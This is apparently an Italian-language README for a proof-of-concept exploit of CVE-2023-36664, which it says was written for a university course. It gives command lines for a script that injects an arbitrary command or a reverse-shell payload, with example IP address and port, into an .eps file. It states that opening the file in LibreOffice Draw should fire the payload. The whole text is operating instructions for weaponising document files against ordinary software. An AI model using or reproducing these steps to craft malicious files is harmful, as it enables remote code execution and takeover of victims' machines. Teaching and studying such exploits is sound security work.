
Prova di concetto sviluppata per il CVE-2023-36664
Prova di concetto per la CVE-2023-36664.
Per inserire un payload in un file .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Per inserire un payload di reverse shell in un file .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
L'apertura del file iniettato in Libreoffice Draw dovrebbe attivare il payload.
Questa prova di concetto è stata sviluppata per un corso specifico all'università. Viene pubblicata qui solo per uso pedagogico.